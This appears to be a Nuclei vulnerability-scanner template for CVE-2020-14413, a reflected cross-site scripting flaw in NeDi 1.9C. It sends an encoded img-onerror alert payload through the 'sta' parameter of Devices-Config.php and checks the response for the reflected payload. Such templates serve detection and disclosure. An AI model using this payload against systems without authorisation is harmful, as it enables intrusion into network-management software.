nuclei-templates/cves/2020/CVE-2020-14413.yaml

31 lines
944 B
YAML

id: CVE-2020-14413
info:
name: NeDi 1.9C XSS
author: pikpikcu
severity: medium
reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
tags: cve,cve2020,nedi,xss
requests:
- method: GET
path:
- '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"